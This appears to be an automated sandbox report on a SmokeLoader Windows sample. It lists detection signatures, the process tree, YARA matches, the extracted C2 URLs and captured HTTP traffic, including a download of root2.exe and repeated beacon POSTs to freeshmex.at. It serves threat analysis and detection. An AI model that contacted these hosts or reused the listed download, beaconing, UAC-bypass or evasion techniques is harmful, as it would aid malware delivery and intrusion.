
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753427
MD5: 44c87d3bc316eefe4dcbf66afed72abc
SHA1: 96bde412ef761b4d53506ae4ed2999bc9dcaf137
SHA256: 731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
Tags: exe
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5020 cmdline: C:\Users\user\Desktop\file.exe MD5: 44C87D3BC316EEFE4DCBF66AFED72ABC)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • B87E.exe (PID: 3316 cmdline: C:\Users\user\AppData\Local\Temp\B87E.exe MD5: 1BD9FB4ADE498938E6432D6C5D1E23A5)
        • rundll32.exe (PID: 2980 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • EBC4.exe (PID: 4608 cmdline: C:\Users\user\AppData\Local\Temp\EBC4.exe MD5: F06F222962C48BB7D822AC0FCD14CFD2)
  • gfgsrbs (PID: 5000 cmdline: C:\Users\user\AppData\Roaming\gfgsrbs MD5: 44C87D3BC316EEFE4DCBF66AFED72ABC)
  • EBC4.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Local\Temp\EBC4.exe" MD5: F06F222962C48BB7D822AC0FCD14CFD2)
  • cleanup
{"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
Source | Rule | Description | Author | Strings
00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Source | Rule | Description | Author | Strings
12.2.EBC4.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
12.2.EBC4.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
7.2.EBC4.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
7.2.EBC4.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: http://piratia.su/tmp/ | URL Reputation: Label: malware
            Source: freeshmex.at | Virustotal: Detection: 18%
            Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp | ReversingLabs: Detection: 24%
            Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp | Virustotal: Detection: 35%
            Source: file.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\gfgsrbs | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\B87E.exe | Joe Sandbox ML: detected
            Source: 12.2.EBC4.exe.2d5112c.2.unpack | Avira: Label: TR/Patched.Ren.Gen7
            Source: 5.2.B87E.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AFD42 CryptGetHashParam,CryptDestroyHash,5_2_004AFD42
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046A04E CryptEncrypt,5_2_0046A04E
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004E828B CryptEncrypt,5_2_004E828B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AF42D CryptHashData,CryptHashData,5_2_004AF42D
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B74F7 CryptExportKey,5_2_004B74F7
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B6481 CryptExportKey,5_2_004B6481
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AE5BE CryptBinaryToStringA,5_2_004AE5BE
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B776F CryptReleaseContext,5_2_004B776F
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3784 CryptDecrypt,5_2_004B3784
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A08 CryptImportKey,5_2_004C3A08
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3AD6 CryptDestroyKey,CryptDestroyKey,5_2_004C3AD6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A88 CryptEncrypt,CryptEncrypt,5_2_004C3A88
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3B61 CryptReleaseContext,5_2_004B3B61
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3B30 CryptReleaseContext,CryptReleaseContext,5_2_004C3B30
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AEBD6 CryptAcquireContextA,CryptAcquireContextA,5_2_004AEBD6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3D56 CryptBinaryToStringA,CryptBinaryToStringA,5_2_004C3D56
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3D04 CryptBinaryToStringA,CryptBinaryToStringA,5_2_004C3D04
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B2E2B CryptHashData,CryptHashData,5_2_004B2E2B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B6ECB CryptExportKey,5_2_004B6ECB

            Exploits

            Source: Yara matchFile source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

            Compliance

            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2
            Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
            Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

            Networking

            Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
            Source: C:\Windows\explorer.exeDomain query: freeshmex.at
            Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
            Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
            Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
            Source: Malware configuration extractorURLs: http://piratia.su/tmp/
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewIP Address: 178.31.176.42 178.31.176.42
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Thu, 24 Nov 2022 19:13:08 GMTContent-Type: application/octet-streamContent-Length: 1041408Last-Modified: Thu, 24 Nov 2022 19:10:04 GMTConnection: keep-aliveETag: "637fc18c-fe400"Accept-Ranges: bytes
            Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdnuetf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jccvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjuand.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugahgtu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: freeshmex.at
            Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbcxtvmmly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmhsk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxmexebq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvudclyoxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewydclhcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufwbup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dmwhplnj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrqcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuvtnsw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fffclev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykhdc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhcqdle.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bussc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rfiijpjae.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bowsudmxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slkwmgvhmh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpaefk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaymxpjge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfwtjemoof.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpaquepn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uphkrwii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mifwrnveyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://motvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfgpwwck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agqugnol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxxlrwdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhiornjar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sloljasy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrxav.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: freeshmex.at
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
            Source: unknownDNS traffic detected: queries for: freeshmex.at
            Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
            Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: B87E.exe, 00000005.00000002.464864822.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A08 CryptImportKey,5_2_004C3A08

            System Summary

            Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
